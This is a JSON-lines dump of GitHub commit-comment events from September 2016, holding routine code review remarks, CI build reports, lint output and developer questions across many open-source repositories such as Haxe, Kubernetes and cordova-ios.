{"id":"4569380905","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19040252,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T17:03:52Z","updated_at":"2016-09-15T17:03:52Z","body":"Here's my current gauntlet of tests:\r\n\r\n```haxe\r\nclass Main {\r\n    static function main(){\r\n\tSome.f();  // no box!\r\n\ttrace(true + \" is the value for true\");\r\n\thandleMrArg(Some.f()); // box!\r\n\tvar k = Some.f(); // no box!\r\n\ttrace(k.a + \" is the value for k.a\");\r\n\tvar l = Some.f(); // box!\r\n\ttrace(l + \" is the value for l\");\r\n    }\r\n    static function handleMrArg(s:C) {\r\n    \ttrace(s.a + \" is the value for s.a\");\r\n    \ttrace(\"yo\");\r\n    }\r\n}\r\n\r\n@:multiReturn extern class C {\r\n    var a:Int;\r\n    var b:Int;\r\n}\r\n\r\nextern class Some {\r\n    static function f():C;\r\n}\r\n```"}},"created_at":"2016-09-15T17:03:52Z"}
{"id":"4569383463","type":"CommitCommentEvent","actor":{"login":"OliverJAsh"},"repo":{"name":"cubik-oss/redux-reducer-effects"},"payload":{"comment":{"id":19040257,"position":152,"line":67,"path":"src/enhancer.ts","commit_id":"249c75dcb924e5c599012b03773cbdd1c1fc2267","created_at":"2016-09-15T17:04:22Z","updated_at":"2016-09-15T17:04:22Z","body":"Nope, let's remove it!\n\nOn Thu, 15 Sep 2016, 17:44 Tim Ruffles, <notifications@github.com> wrote:\n\n> is hasChanged used?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cubik-oss/redux-reducer-effects/commit/249c75dcb924e5c599012b03773cbdd1c1fc2267#commitcomment-19039956>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA4QCUimPqU3F7Z2mJC7vG8dPzqPoOVRks5qqXXjgaJpZM4J-FkQ>\n> .\n>\n"}},"created_at":"2016-09-15T17:04:22Z"}
{"id":"4569383991","type":"CommitCommentEvent","actor":{"login":"lfarah"},"repo":{"name":"mixpanel/mixpanel-swift"},"payload":{"comment":{"id":19040259,"position":null,"line":null,"path":null,"commit_id":"d7e59bf251ae18fa794451321eead12741feb4ab","created_at":"2016-09-15T17:04:28Z","updated_at":"2016-09-15T17:04:28Z","body":"Thanks, @yarneo!"}},"created_at":"2016-09-15T17:04:28Z"}
{"id":"4569384321","type":"CommitCommentEvent","actor":{"login":"sofar"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19040260,"position":31,"line":140,"path":"mods/stairs/init.lua","commit_id":"b848e35ca59c9eea3dbe3df87cb14d6bfea93f9a","created_at":"2016-09-15T17:04:32Z","updated_at":"2016-09-15T17:04:32Z","body":"`under` here will be either `ignore` or (some node) or `stairs:slab_wood`.\r\n\r\nIf it's `ignore` then it's impossible that the player also wields a `ignore` node and so this section is never executed, and the slab is placed above the `ignore` node (line 182 and beyond) which uses minetest.item_place(), and that one will succeed placing the wielded slab(*).\r\n\r\nEven though technically we should check for `node.name == \"ignore\"`, the check can be omitted in this particular case due to the fact that the game will likely blow up badly if the player manages to get an `ignore` node in their inventory."}},"created_at":"2016-09-15T17:04:32Z"}
{"id":"4569387840","type":"CommitCommentEvent","actor":{"login":"smiklosovic"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":19040264,"position":49,"line":49,"path":"jira/src/main/java/org/arquillian/extension/governor/jira/impl/reporter/JiraGovernorRecorder.java","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-15T17:05:12Z","updated_at":"2016-09-15T17:05:12Z","body":"honestly i dont remember anymore, mostly it is just a way how to get that info from common place, once i put it there while scanning"}},"created_at":"2016-09-15T17:05:12Z"}
{"id":"4569392210","type":"CommitCommentEvent","actor":{"login":"papillon1026"},"repo":{"name":"papillon1026/hello"},"payload":{"comment":{"id":19040273,"position":null,"line":null,"path":null,"commit_id":"dca071ae394c9a649688a65900ec6f1c0653e06b","created_at":"2016-09-15T17:05:59Z","updated_at":"2016-09-15T17:05:59Z","body":"our future"}},"created_at":"2016-09-15T17:05:59Z"}
{"id":"4569393378","type":"CommitCommentEvent","actor":{"login":"ArseniyShestakov"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19040275,"position":null,"line":null,"path":null,"commit_id":"fdca75b4b0c134ea41f1c819f83bf3c38eceb889","created_at":"2016-09-15T17:06:13Z","updated_at":"2016-09-15T17:06:13Z","body":"It's abbreviation for \"Localization\" and it's very popular in web development at least."}},"created_at":"2016-09-15T17:06:13Z"}
{"id":"4569396375","type":"CommitCommentEvent","actor":{"login":"h0tbird"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19040284,"position":54,"line":54,"path":"hack/make-rules/helpers/cache_go_dirs.sh","commit_id":"665966746912ea28b5511f55b75540187a4ef907","created_at":"2016-09-15T17:06:42Z","updated_at":"2016-09-15T17:06:42Z","body":"The `-quit` flag is not supported in Alpine Linux (BusyBox v1.24.2)\r\n\r\n```\r\nfind: unrecognized: -quit\r\nBusyBox v1.24.2 (2016-06-23 08:49:16 GMT) multi-call binary.\r\n\r\nUsage: find [-HL] [PATH]... [OPTIONS] [ACTIONS]\r\n```"}},"created_at":"2016-09-15T17:06:42Z"}
{"id":"4569399045","type":"CommitCommentEvent","actor":{"login":"mogar"},"repo":{"name":"EnhancedRadioDevices/915MHzEdisonExplorer_SW"},"payload":{"comment":{"id":19040290,"position":null,"line":null,"path":null,"commit_id":"728ec95e0650ae7405d9675ecec84cdac35a8818","created_at":"2016-09-15T17:07:05Z","updated_at":"2016-09-15T17:07:05Z","body":"Awesome! Thanks for the update. I'll get this wrapped into the Explorer\nboard tomorrow!\n\nOn Wed, Sep 14, 2016 at 9:02 PM, Pete Schwamb <notifications@github.com>\nwrote:\n\n> Morgan, I just spent almost a week on getting this working. Turns out the\n> code that both you and I started with is targeting the cc2430, and what the\n> cc-debugger does is actually quite a bit different.\n>\n> I used a logic analyzer (Salaea logic) to turn the levels into bytes using\n> its SPI parser, and then wrote some code (https://github.com/ps2/riled_\n> up_tools/blob/master/ccprog/parse_debug.rb) to turn those bytes into a\n> protocol and assembly level view: https://gist.github.com/ps2/\n> 8694b78571f2cbf061d2c1797434fa5d\n>\n> After I figured out what it was doing, I updated the code to to mimic it,\n> and I'm now getting flash dumps that match the flash writes:\n> https://github.com/ps2/riled_up_tools/blob/master/ccprog/ccprog.c\n>\n> Since I was flailing so much getting it working, the code is a mess. I\n> hope to clean it up next week sometime.\n>\n> I wanted to let you know the swamps I've slogged through so you don't have\n> to. You can see in the code that the DUP_ registers are all different, that\n> DMA is set up differently, and that even the cc-debugger commands are\n> different in places.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/EnhancedRadioDevices/915MHzEdisonExplorer_SW/commit/728ec95e0650ae7405d9675ecec84cdac35a8818#commitcomment-19030270>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AApIHgg7VDKBwBlOUqljNFb6LZe4KgnEks5qqMM9gaJpZM4J9eiD>\n> .\n>\n"}},"created_at":"2016-09-15T17:07:05Z"}
{"id":"4569402873","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19040303,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T17:07:47Z","updated_at":"2016-09-15T17:07:47Z","body":"honestly, @nadako's code was already pretty good.  It was just boxing when the return was unused.  I was trying to avoid that."}},"created_at":"2016-09-15T17:07:47Z"}
{"id":"4569404675","type":"CommitCommentEvent","actor":{"login":"Ridaz"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19040313,"position":null,"line":null,"path":null,"commit_id":"70631e8ffddbe4062f239eb1ab7e0daaae11b5f0","created_at":"2016-09-15T17:08:10Z","updated_at":"2016-09-15T17:08:10Z","body":"Fury Swipes:\r\n![fury swipes](https://cloud.githubusercontent.com/assets/7467006/18559444/2b994e56-7b6f-11e6-9b0d-db3acccfffc5.gif)\r\n"}},"created_at":"2016-09-15T17:08:10Z"}
{"id":"4569405480","type":"CommitCommentEvent","actor":{"login":"jypma"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19040315,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-15T17:08:18Z","updated_at":"2016-09-15T17:08:18Z","body":"@elli89 or @chrism333 , I realize it's been a while since you've worked on this, but I'm actually working on a similar high-level C++ library for AVR (https://github.com/jypma/AvrLib, not nearly there yet though). I really like your approach of re-modeling the memory mapped registers in a type-safe way, and would like to try something similar for the ATMega328 which is the main chip my lib is about. \r\n\r\nDid you write your `io.hpp` by hand from the avr-libc definitions, or did you use some sort of code generator? I'm not looking forward to doing something similar by hand for all of ATmega328... :-)\r\n\r\nThanks for any help or pointers! I realize it's a long shot ;-)"}},"created_at":"2016-09-15T17:08:18Z"}
{"id":"4569412650","type":"CommitCommentEvent","actor":{"login":"onlineliuxin"},"repo":{"name":"onlineliuxin/onlineliuxin.tt"},"payload":{"comment":{"id":19040342,"position":null,"line":null,"path":null,"commit_id":"e3effcf40405b1be407562ac6a2ec093a69ab434","created_at":"2016-09-15T17:09:30Z","updated_at":"2016-09-15T17:09:30Z","body":"# **123123**__"}},"created_at":"2016-09-15T17:09:30Z"}
{"id":"4569413283","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19040343,"position":null,"line":null,"path":null,"commit_id":"f6bb57f1bdb79f4d7b8346dbd4d2359fd1b93b7f","created_at":"2016-09-15T17:09:37Z","updated_at":"2016-09-15T17:09:37Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/472/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T17:09:37Z"}
{"id":"4569414270","type":"CommitCommentEvent","actor":{"login":"CaseyCarter"},"repo":{"name":"ericniebler/range-v3"},"payload":{"comment":{"id":19040344,"position":42,"line":316,"path":"include/range/v3/detail/config.hpp","commit_id":"4cfcb59c3db1c279d72c64ccf15de3c724a0362d","created_at":"2016-09-15T17:09:47Z","updated_at":"2016-09-15T17:09:47Z","body":"inline variables are sugar for variable templates which are sugar for static data members of class templates. Given:\r\n```c++\r\ninline T foo = expr;\r\n\r\ntemplate<class = void>\r\nT bar = expr;\r\n\r\ntemplate<class = void>\r\nstruct baz {\r\n  static T bop;\r\n};\r\n\r\ntemplate<>\r\nT baz<void>::bop = expr;\r\n```\r\n`foo`, `bar<>`, and `baz<>::bop` are all equivalent. `foo` is clearly much more satisfying to type than `baz<>::bop`, which is why range-v3 goes out of its way with the \"`constexpr` reference inside an unnamed namespace\" trick to get the short and simple usage syntax.\r\n\r\nI would hope that the inline variable syntax, due to being simpler, would ever so slightly improve compiler throughput and be easier to optimize. Pragmatically the only real advantage is likely the same as we get from having multiple code paths for bug workarounds instead of simply using the most general solution: better coverage of more features across the compilers, which (hopefully) results in better compilers."}},"created_at":"2016-09-15T17:09:47Z"}
{"id":"4569415989","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19040350,"position":null,"line":null,"path":null,"commit_id":"e9494152e977644bec904d68abc52c1067e8de48","created_at":"2016-09-15T17:10:05Z","updated_at":"2016-09-15T17:10:05Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2370 of 2370 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T17:10:05Z"}
{"id":"4569421928","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19040363,"position":null,"line":null,"path":null,"commit_id":"e9494152e977644bec904d68abc52c1067e8de48","created_at":"2016-09-15T17:11:07Z","updated_at":"2016-09-15T17:11:07Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T17:11:07Z"}
{"id":"4569427534","type":"CommitCommentEvent","actor":{"login":"taschini"},"repo":{"name":"morepath/reg"},"payload":{"comment":{"id":19040380,"position":null,"line":null,"path":null,"commit_id":"92ddf5d02e9bdf02ab900a96560905bce89f324b","created_at":"2016-09-15T17:12:10Z","updated_at":"2016-09-15T17:12:10Z","body":"Just following [standard practice](https://docs.python.org/3/howto/pyporting.html#use-feature-detection-instead-of-version-detection).\r\n"}},"created_at":"2016-09-15T17:12:10Z"}
{"id":"4569428002","type":"CommitCommentEvent","actor":{"login":"SwathiVarkala"},"repo":{"name":"Bahmni/openmrs-module-bahmniapps"},"payload":{"comment":{"id":19040382,"position":null,"line":null,"path":null,"commit_id":"86fa10b92ed1d2adad4507c2800bb88d3a48fcf0","created_at":"2016-09-15T17:12:16Z","updated_at":"2016-09-15T17:12:16Z","body":"@shireeshaBongarala: 👍 for cherry-pick"}},"created_at":"2016-09-15T17:12:16Z"}
{"id":"4569428259","type":"CommitCommentEvent","actor":{"login":"thockin"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19040383,"position":54,"line":54,"path":"hack/make-rules/helpers/cache_go_dirs.sh","commit_id":"665966746912ea28b5511f55b75540187a4ef907","created_at":"2016-09-15T17:12:18Z","updated_at":"2016-09-15T17:12:18Z","body":"I'm open to fixes but I do not want to adulterate everything to handle\nniche (sorry) build envs.  At some point we need to draw a line.  I'm\nalready grumpy about support Mac.\n\nOn Thu, Sep 15, 2016 at 10:07 AM, Marc Villacorta <notifications@github.com>\nwrote:\n\n> The -quit flag is not supported in Alpine Linux (BusyBox v1.24.2)\n>\n> find: unrecognized: -quit\n> BusyBox v1.24.2 (2016-06-23 08:49:16 GMT) multi-call binary.\n>\n> Usage: find [-HL] [PATH]... [OPTIONS] [ACTIONS]\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kubernetes/kubernetes/commit/665966746912ea28b5511f55b75540187a4ef907#commitcomment-19040284>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFVgVDyuY9FjVpILDIf-u1xDkc-NOk9dks5qqXtQgaJpZM4J-G1G>\n> .\n>\n"}},"created_at":"2016-09-15T17:12:18Z"}
{"id":"4569433619","type":"CommitCommentEvent","actor":{"login":"lmouline"},"repo":{"name":"kevoree-modeling/mwDB"},"payload":{"comment":{"id":19040395,"position":null,"line":null,"path":null,"commit_id":"b5fdafc5dd6e3a85fdd59183e311857495469563","created_at":"2016-09-15T17:13:19Z","updated_at":"2016-09-15T17:13:19Z","body":"@dukeboard wring reference XD\r\nit is just a draft, should we delete?\r\n"}},"created_at":"2016-09-15T17:13:19Z"}
{"id":"4569433727","type":"CommitCommentEvent","actor":{"login":"tdeason416"},"repo":{"name":"tdeason416/pitchbook"},"payload":{"comment":{"id":19040396,"position":null,"line":null,"path":null,"commit_id":"5c5f517cd80478aa4b589eee428daf278c70dca7","created_at":"2016-09-15T17:13:19Z","updated_at":"2016-09-15T17:13:19Z","body":"Scrapes websites for data pertaining to company management and contact information and stores that data on Aws online database"}},"created_at":"2016-09-15T17:13:19Z"}
{"id":"4569437190","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19040408,"position":null,"line":null,"path":null,"commit_id":"9ba6bd1e2ffccc546863db488c5d609a2e126d15","created_at":"2016-09-15T17:13:58Z","updated_at":"2016-09-15T17:13:58Z","body":"[R/ABC_SMC.R:186:1:](https://github.com/richelbilderbeek/nLTT/blob/9ba6bd1e2ffccc546863db488c5d609a2e126d15/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```"}},"created_at":"2016-09-15T17:13:58Z"}
{"id":"4569437427","type":"CommitCommentEvent","actor":{"login":"seria1"},"repo":{"name":"Esri/developer-support"},"payload":{"comment":{"id":19040409,"position":null,"line":null,"path":null,"commit_id":"6344e6756d69eb3ccafd52e7ad8eb81192713c16","created_at":"2016-09-15T17:14:01Z","updated_at":"2016-09-15T17:14:01Z","body":"Thank you for this information, JF990. Will keep this in mind in the future. "}},"created_at":"2016-09-15T17:14:01Z"}
{"id":"4569439036","type":"CommitCommentEvent","actor":{"login":"vusy-nathan"},"repo":{"name":"ninuxorg/nodeshot"},"payload":{"comment":{"id":19040411,"position":null,"line":null,"path":null,"commit_id":"b5f925346b458c815a030eae21ac343de2d2b050","created_at":"2016-09-15T17:14:19Z","updated_at":"2016-09-15T17:14:19Z","body":"i have installed nodeshot on ubuntu 14 server and now i can access the admin page. but i dont know where to begin to add the layers and the nodes to see the links of the nodes. i am administering a mesh network of seven nodes running batman-adv on secn firmware based on openwrt. what are the steps to see the nodes connected to each other?"}},"created_at":"2016-09-15T17:14:19Z"}
{"id":"4569440242","type":"CommitCommentEvent","actor":{"login":"FALSEYING"},"repo":{"name":"FALSEYING/MFEBOT"},"payload":{"comment":{"id":19040414,"position":null,"line":null,"path":null,"commit_id":"412df4c66f6168f34e3519f98d38974f76c2ebba","created_at":"2016-09-15T17:14:33Z","updated_at":"2016-09-15T17:14:33Z","body":"es"}},"created_at":"2016-09-15T17:14:33Z"}
{"id":"4569452481","type":"CommitCommentEvent","actor":{"login":"ZombieRoxtar"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19040450,"position":99,"line":99,"path":"LxssLoader/lxss.h","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T17:16:53Z","updated_at":"2016-09-15T17:16:53Z","body":"I guess. I did say that I got code from the other guy in the cpp."}},"created_at":"2016-09-15T17:16:53Z"}
{"id":"4569456726","type":"CommitCommentEvent","actor":{"login":"ZombieRoxtar"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19040456,"position":34,"line":34,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T17:17:40Z","updated_at":"2016-09-15T17:17:40Z","body":"Why?"}},"created_at":"2016-09-15T17:17:40Z"}
{"id":"4569462926","type":"CommitCommentEvent","actor":{"login":"Hadatko"},"repo":{"name":"EmbeddedRPC/erpc"},"payload":{"comment":{"id":19040470,"position":4,"line":34,"path":"erpc_c/setup/erpc_setup.h","commit_id":"142ecdb6a595d5ad76da0a4b53c8a4e5ee8868f9","created_at":"2016-09-15T17:18:50Z","updated_at":"2016-09-15T17:18:50Z","body":"1. Not must but we are keeping only necessary header files includes. For example we are using coverity check for this and redundant includes are throwing warnings, which we want reduce to minimum. And i am not sure but compiling should be faster. Maybe not.\r\n\r\n2. https://en.wikipedia.org/wiki/Pragma_once - In the C and C++ programming languages, #pragma once is a non-standard but widely supported preprocessor directive.\r\n\r\n"}},"created_at":"2016-09-15T17:18:50Z"}
{"id":"4569463941","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19040472,"position":null,"line":null,"path":null,"commit_id":"0aed502f8a9e3c56db909213cb3ea07715f3adb2","created_at":"2016-09-15T17:19:02Z","updated_at":"2016-09-15T17:19:02Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-PullRequest.449+38](http://build.prxm.it:8813/viewLog.html?buildId=3652&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:44"}},"created_at":"2016-09-15T17:19:02Z"}
{"id":"4569472293","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19040512,"position":null,"line":null,"path":null,"commit_id":"0aed502f8a9e3c56db909213cb3ea07715f3adb2","created_at":"2016-09-15T17:20:36Z","updated_at":"2016-09-15T17:20:36Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-logRefactoring.37](http://build.prxm.it:8813/viewLog.html?buildId=3653&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:33"}},"created_at":"2016-09-15T17:20:36Z"}
{"id":"4569474210","type":"CommitCommentEvent","actor":{"login":"jeet123dutta"},"repo":{"name":"jeet123dutta/jeet"},"payload":{"comment":{"id":19040521,"position":1,"line":1,"path":"README.md","commit_id":"f5a35edc206b36440fa471cfdb329ec429803915","created_at":"2016-09-15T17:20:57Z","updated_at":"2016-09-15T17:20:57Z","body":"My Website"}},"created_at":"2016-09-15T17:20:57Z"}
{"id":"4569474525","type":"CommitCommentEvent","actor":{"login":"sampsongao"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19040522,"position":286,"line":376,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-15T17:21:01Z","updated_at":"2016-09-15T17:21:01Z","body":"In v8 object Has method, it accept only Handle<String>. There is a TODO above the Has method saying they want to accept Handle<Value>. But for the version v8 include, they haven't resolve this."}},"created_at":"2016-09-15T17:21:01Z"}
{"id":"4569478624","type":"CommitCommentEvent","actor":{"login":"IMCamilo"},"repo":{"name":"IMCamilo/compite"},"payload":{"comment":{"id":19040544,"position":5,"line":44,"path":"grails-app/controllers/compite/UsuarioController.groovy","commit_id":"284a5715c5adf7f7f6daaffaa32b469847cc66e9","created_at":"2016-09-15T17:21:50Z","updated_at":"2016-09-15T17:21:50Z","body":"@cepardov por que seteaste method en \"GET\".  Sobre todo post creación de un registro?"}},"created_at":"2016-09-15T17:21:50Z"}
{"id":"4569483539","type":"CommitCommentEvent","actor":{"login":"dpogue"},"repo":{"name":"apache/cordova-ios"},"payload":{"comment":{"id":19040558,"position":null,"line":null,"path":null,"commit_id":"92a62997adb3c8512328d5a0ae42fe5d156291f1","created_at":"2016-09-15T17:22:45Z","updated_at":"2016-09-15T17:22:45Z","body":"@shazron I think you might also need to add `developmentTeam` as a command-line option to https://github.com/apache/cordova-ios/blob/master/bin/templates/scripts/cordova/build#L34 ?"}},"created_at":"2016-09-15T17:22:45Z"}
{"id":"4569485243","type":"CommitCommentEvent","actor":{"login":"rvock"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19040564,"position":null,"line":null,"path":null,"commit_id":"7154631c28981f1e1b67958c8ea6a46210fb17fa","created_at":"2016-09-15T17:23:04Z","updated_at":"2016-09-15T17:23:04Z","body":"What version of PHP are you using?\r\nPHP 5.6 needs the /u for me, PHP 7 works fine without."}},"created_at":"2016-09-15T17:23:04Z"}
{"id":"4569493578","type":"CommitCommentEvent","actor":{"login":"HappyRay"},"repo":{"name":"azkaban/azkaban"},"payload":{"comment":{"id":19040589,"position":72,"line":124,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"27c0a43ca235fd1c1eae26c5902a5bccbe2f1cea","created_at":"2016-09-15T17:24:38Z","updated_at":"2016-09-15T17:24:38Z","body":"Why this change?"}},"created_at":"2016-09-15T17:24:38Z"}
{"id":"4569495366","type":"CommitCommentEvent","actor":{"login":"1wheel"},"repo":{"name":"TheUpshot/prison-admissions"},"payload":{"comment":{"id":19040595,"position":null,"line":null,"path":null,"commit_id":"f95448240dafa279d2805c24d03ffa8554ba07c1","created_at":"2016-09-15T17:24:58Z","updated_at":"2016-09-15T17:24:58Z","body":"The slope chart only includes counties with both 2006 and 2013 data - all New Mexico counties were excluded since we didn't have 2006 data for them.\r\n\r\nI am not totally sure what the aggregate 2008 or 2011 values look like. We made an early decision to focus on cleaning the earliest year that looked like it had good data for most of the states (2006) and the latest year with most of the states (2013).  "}},"created_at":"2016-09-15T17:24:58Z"}
{"id":"4569496751","type":"CommitCommentEvent","actor":{"login":"jtbandes"},"repo":{"name":"apple/swift-evolution"},"payload":{"comment":{"id":19040599,"position":5,"line":251,"path":"proposals/0107-unsaferawpointer.md","commit_id":"aefbffae2efe08a6a05a87da367f7774474b144e","created_at":"2016-09-15T17:25:14Z","updated_at":"2016-09-15T17:25:14Z","body":"Still needs gardening (two `m`s)"}},"created_at":"2016-09-15T17:25:14Z"}
{"id":"4569497143","type":"CommitCommentEvent","actor":{"login":"shazron"},"repo":{"name":"apache/cordova-ios"},"payload":{"comment":{"id":19040600,"position":null,"line":null,"path":null,"commit_id":"92a62997adb3c8512328d5a0ae42fe5d156291f1","created_at":"2016-09-15T17:25:17Z","updated_at":"2016-09-15T17:25:17Z","body":"@dpogue ah yes, I forgot about that option. I'll add it. thanks!"}},"created_at":"2016-09-15T17:25:17Z"}
{"id":"4569499679","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19040611,"position":null,"line":null,"path":null,"commit_id":"6c792f5881500ac75751d7950f0b429863c67c7a","created_at":"2016-09-15T17:25:45Z","updated_at":"2016-09-15T17:25:45Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-unstable.93](http://build.prxm.it:8813/viewLog.html?buildId=3654&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:25"}},"created_at":"2016-09-15T17:25:45Z"}
{"id":"4569501396","type":"CommitCommentEvent","actor":{"login":"ZombieRoxtar"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19040622,"position":76,"line":76,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T17:26:04Z","updated_at":"2016-09-15T17:26:04Z","body":"Yes. With both gone the session cannot start. The first one is needed for the second one and without the second one, the instance cannot start."}},"created_at":"2016-09-15T17:26:04Z"}
{"id":"4569504709","type":"CommitCommentEvent","actor":{"login":"shazron"},"repo":{"name":"apache/cordova-ios"},"payload":{"comment":{"id":19040632,"position":null,"line":null,"path":null,"commit_id":"92a62997adb3c8512328d5a0ae42fe5d156291f1","created_at":"2016-09-15T17:26:39Z","updated_at":"2016-09-15T17:26:39Z","body":"@Kjens93 cordova-ios-4.3.0. Still shaking out the bugs for iOS 10 and see what else needs to get into this release, since this requires a tools release as well for the CocoaPods support coming in the same release."}},"created_at":"2016-09-15T17:26:39Z"}
{"id":"4569505908","type":"CommitCommentEvent","actor":{"login":"desalesouche"},"repo":{"name":"G620S-HUAWEI/android_kernel_huawei_msm8916"},"payload":{"comment":{"id":19040634,"position":null,"line":null,"path":null,"commit_id":"f44b0b84b6576ba2fe1b45fedaf51a256546d648","created_at":"2016-09-15T17:26:51Z","updated_at":"2016-09-15T17:26:51Z","body":"reverting that commit and previous one is fixing non working videocam record. "}},"created_at":"2016-09-15T17:26:51Z"}
{"id":"4569507149","type":"CommitCommentEvent","actor":{"login":"syscrusher"},"repo":{"name":"syscrusher/golang.tmbundle"},"payload":{"comment":{"id":19040640,"position":4,"line":4,"path":"Support/gomate.rb","commit_id":"6ff13b967cebae6da22eb0dd3ef5ad585a2190cc","created_at":"2016-09-15T17:27:06Z","updated_at":"2016-09-15T17:27:06Z","body":"D'oh. Thanks."}},"created_at":"2016-09-15T17:27:06Z"}
{"id":"4569509731","type":"CommitCommentEvent","actor":{"login":"x-cessive"},"repo":{"name":"x-cessive/X-Cessive-Exile-Tanoa"},"payload":{"comment":{"id":19040647,"position":5,"line":0,"path":"exile.tanoa/description.ext","commit_id":"9ab0043847c6ab1c99886df8e67cc767c653fd52","created_at":"2016-09-15T17:27:33Z","updated_at":"2016-09-15T17:27:33Z","body":"This was incorrect."}},"created_at":"2016-09-15T17:27:33Z"}
{"id":"4569511945","type":"CommitCommentEvent","actor":{"login":"jonesde"},"repo":{"name":"moqui/moqui-framework"},"payload":{"comment":{"id":19040653,"position":144,"line":227,"path":"framework/src/main/groovy/org/moqui/impl/screen/ScreenUrlInfo.groovy","commit_id":"d2933518f438cb3e5ead16bd5c5a8a0d190038fc","created_at":"2016-09-15T17:27:56Z","updated_at":"2016-09-15T17:27:56Z","body":"I'm not sure why this never caused issues, or maybe it caused issues that don't come up in most usage, but anyway this is fixed in commit #72c1441."}},"created_at":"2016-09-15T17:27:56Z"}
